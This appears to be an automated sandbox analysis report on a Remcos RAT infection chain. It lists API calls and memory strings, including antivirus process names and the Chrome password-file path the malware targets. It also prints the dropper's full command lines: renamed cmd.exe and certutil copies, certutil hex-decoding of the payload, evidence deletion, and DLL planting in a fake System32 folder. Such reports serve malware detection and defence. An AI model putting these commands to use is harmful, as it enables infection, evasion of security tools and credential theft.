Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_1455880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	24_2_1455880C
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_1455783C FindFirstFileW,FindNextFileW,	24_2_1455783C
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_14569AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	24_2_14569AF5
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_1455BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	24_2_1455BB30
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_02A558CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	24_2_02A558CC

Source: C:\Users\Public\Libraries\Mywiztwu.PIF

Code function: 24_2_14557C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

24_2_14557C97

Source: C:\Users\Public\kn.exe

Code function: 6_2_00007FF66594511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,

6_2_00007FF66594511C

Source: sppsvc.pif, 00000009.00000002.4103265846.000000000070E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWM
Source: Mywiztwu.PIF, 00000018.00000002.1950184254.0000000000818000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-
Source: sppsvc.pif, 00000009.00000002.4103265846.00000000006D9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`*q%SystemRoot%\system32\mswsock.dll>
Source: sppsvc.pif, 00000009.00000002.4103265846.000000000070E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Mywiztwu.PIF, 00000019.00000002.2031904948.00000000006F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL

Source: C:\Users\Public\Libraries\sppsvc.pif	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\sppsvc.pif	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\sppsvc.pif	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	API call chain: ExitProcess graph end node

Source: C:\Users\Public\alpha.exe

Code function: 3_2_00007FF683F963FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,

3_2_00007FF683F963FC

Source: C:\Users\Public\Libraries\sppsvc.pif

Code function: 9_2_152A4D86 GetSystemDirectoryA,LoadLibraryA,LoadLibraryA,GetProcAddress,

9_2_152A4D86

Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152D32B5 mov eax, dword ptr fs:[00000030h]		9_2_152D32B5
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_145932B5 mov eax, dword ptr fs:[00000030h]		24_2_145932B5

Source: C:\Users\Public\alpha.exe

Code function: 3_2_00007FF683F84D5C InitializeCriticalSection,SetConsoleCtrlHandler,_get_osfhandle,GetConsoleMode,_get_osfhandle,GetConsoleMode,GetCommandLineW,GetCommandLineW,GetWindowsDirectoryW,GetConsoleOutputCP,GetCPInfo,GetProcessHeap,HeapAlloc,GetConsoleTitleW,GetStdHandle,GetConsoleScreenBufferInfo,GlobalFree,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,free,

3_2_00007FF683F84D5C

Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F88FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00007FF683F88FA4
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F893B0 SetUnhandledExceptionFilter,	3_2_00007FF683F893B0
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F88FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00007FF683F88FA4
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F893B0 SetUnhandledExceptionFilter,	5_2_00007FF683F893B0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665994E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00007FF665994E18
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659953E0 SetUnhandledExceptionFilter,	6_2_00007FF6659953E0
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152C4FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_152C4FDC
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152C49F8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_152C49F8
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152C49F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_152C49F9
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152CBB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_152CBB22
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152C4B47 SetUnhandledExceptionFilter,	9_2_152C4B47
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F88FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FF683F88FA4
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F893B0 SetUnhandledExceptionFilter,	10_2_00007FF683F893B0
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F88FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00007FF683F88FA4
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F893B0 SetUnhandledExceptionFilter,	11_2_00007FF683F893B0
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_14584FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	24_2_14584FDC
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_145849F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_145849F9
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_14584B47 SetUnhandledExceptionFilter,	24_2_14584B47
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_1458BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_1458BB22

HIPS / PFW / Operating System Protection Evasion

Drops or copies certutil.exe with a different name (likely to bypass HIPS)

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\Public\kn.exe

Jump to dropped file

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\Public\alpha.exe

Jump to dropped file

Source: C:\Users\Public\Libraries\Mywiztwu.PIF

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe

24_2_145620F7

Source: C:\Users\Public\kn.exe

Code function: 6_2_00007FF665947024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356,

6_2_00007FF665947024

Source: C:\Users\Public\Libraries\sppsvc.pif

Code function: 9_2_152A9627 mouse_event,

9_2_152A9627

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\URGENTE_NOTIFICATION.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Libraries\sppsvc.pif C:\Users\Public\Libraries\sppsvc.pif	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\sppsvc.rtf" / A / F / Q / S	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\URGENTE_NOTIFICATION.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "Aaa.bat" "C:\Windows \System32\" /K /D /H /Y	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y	Jump to behavior

Source: C:\Users\Public\kn.exe

Code function: 6_2_00007FF665934AF4 GetSecurityDescriptorDacl,GetLastError,SetEntriesInAclW,SetSecurityDescriptorDacl,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,

6_2_00007FF665934AF4

Source: C:\Users\Public\kn.exe

Code function: 6_2_00007FF665944E98 AllocateAndInitializeSid,GetLastError,#357,GetCurrentThread,GetLastError,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,DuplicateToken,GetLastError,CheckTokenMembership,GetLastError,CloseHandle,CloseHandle,FreeSid,

6_2_00007FF665944E98

Source: sppsvc.pif, 00000009.00000002.4116175112.0000000014918000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager'
Source: sppsvc.pif, 00000009.00000003.2526235320.00000000148A1000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4116175112.0000000014918000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4103265846.000000000069E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: sppsvc.pif, 00000009.00000002.4103265846.000000000069E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerJL\
Source: sppsvc.pif, 00000009.00000002.4103265846.000000000069E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerJL\K
Source: sppsvc.pif, 00000009.00000002.4103265846.000000000069E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerr\|
Source: sppsvc.pif, 00000009.00000002.4103265846.000000000069E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerJL\9
Source: sppsvc.pif, 00000009.00000003.2526235320.00000000148A1000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4116175112.0000000014918000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: sppsvc.pif, 00000009.00000003.2526235320.00000000148A1000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4104133533.000000000078B000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4116056398.0000000014914000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: sppsvc.pif, 00000009.00000002.4104133533.0000000000777000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.2526235320.00000000148A1000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4104133533.000000000078E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [Program Manager]
Source: sppsvc.pif, 00000009.00000003.2527353506.0000000000764000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4104133533.0000000000764000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerJL\c

Source: C:\Users\Public\Libraries\sppsvc.pif

Code function: 9_2_152C4C52 cpuid

9_2_152C4C52

Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	3_2_00007FF683F851EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	3_2_00007FF683F83140
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	3_2_00007FF683F76EE4
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	5_2_00007FF683F851EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	5_2_00007FF683F83140
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	5_2_00007FF683F76EE4
Source: C:\Users\Public\kn.exe	Code function: LoadLibraryW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,	6_2_00007FF665993800
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: CoInitialize,WinExec,EnumSystemLocalesA,	9_2_0284D5D0
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: EnumSystemLocalesA,	9_2_02855F9F
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: GetLocaleInfoW,	9_2_152E2543
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	9_2_152E243C
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: EnumSystemLocalesW,	9_2_152D8404
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	9_2_152E1CD8
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: EnumSystemLocalesW,	9_2_152E1F50
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: EnumSystemLocalesW,	9_2_152E1F9B
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	9_2_152E2610
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: EnumSystemLocalesW,	9_2_152E2036
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: GetLocaleInfoW,	9_2_152D88ED
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: GetLocaleInfoW,	9_2_152E2313
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: GetLocaleInfoA,	9_2_1529F8D1
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	10_2_00007FF683F851EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	10_2_00007FF683F83140
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	10_2_00007FF683F76EE4
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	11_2_00007FF683F851EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	11_2_00007FF683F83140
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	11_2_00007FF683F76EE4
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: EnumSystemLocalesW,	24_2_14598404
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	24_2_145A243C
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: GetLocaleInfoW,	24_2_145A2543
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	24_2_145A2610
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: EnumSystemLocalesW,	24_2_145A2036
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	24_2_145A20C3
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: GetLocaleInfoW,	24_2_145A2313
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	24_2_145A1CD8
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: EnumSystemLocalesW,	24_2_145A1F50
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: EnumSystemLocalesW,	24_2_145A1F9B
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: GetLocaleInfoA,	24_2_1455F8D1
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: GetLocaleInfoW,	24_2_145988ED
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,	24_2_02A6D5D0
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	24_2_02A55A90
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: GetLocaleInfoA,	24_2_02A5A780
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: GetLocaleInfoA,	24_2_02A5A7CC
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,	24_2_02A6D5D0
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	24_2_02A55B9C
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: GetCurrentProcess,EnumSystemLocalesA,ExitProcess,	24_2_02A75FA0

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\alpha.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\alpha.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\Public\alpha.exe

Code function: 3_2_00007FF683F83140 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,

3_2_00007FF683F83140

Source: C:\Users\Public\kn.exe

Code function: 6_2_00007FF6659770F4 LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LocalAlloc,LookupAccountNameW,GetLastError,ConvertSidToStringSidW,GetLastError,#357,LocalFree,LocalFree,LocalFree,

6_2_00007FF6659770F4

Source: C:\Users\Public\Libraries\sppsvc.pif

Code function: 9_2_152D93AD _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

9_2_152D93AD

Source: C:\Users\Public\alpha.exe

Code function: 3_2_00007FF683F7586C GetVersion,

3_2_00007FF683F7586C

Source: sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: cmdagent.exe
Source: sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: quhlpsvc.exe
Source: sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgamsvr.exe
Source: sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Vsserv.exe
Source: sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgupsvc.exe
Source: sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgemc.exe
Source: sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 24.2.Mywiztwu.PIF.14550000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Mywiztwu.PIF.14550000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000002.2031904948.0000000000704000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1995878504.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2527196256.000000000076E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1961939328.0000000014550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sppsvc.pif PID: 3664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Mywiztwu.PIF PID: 6548, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Mywiztwu.PIF PID: 3060, type: MEMORYSTR

Contains functionality to steal Chrome passwords or cookies

Source: C:\Users\Public\Libraries\Mywiztwu.PIF

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

24_2_1455BA12

Contains functionality to steal Firefox passwords or cookies

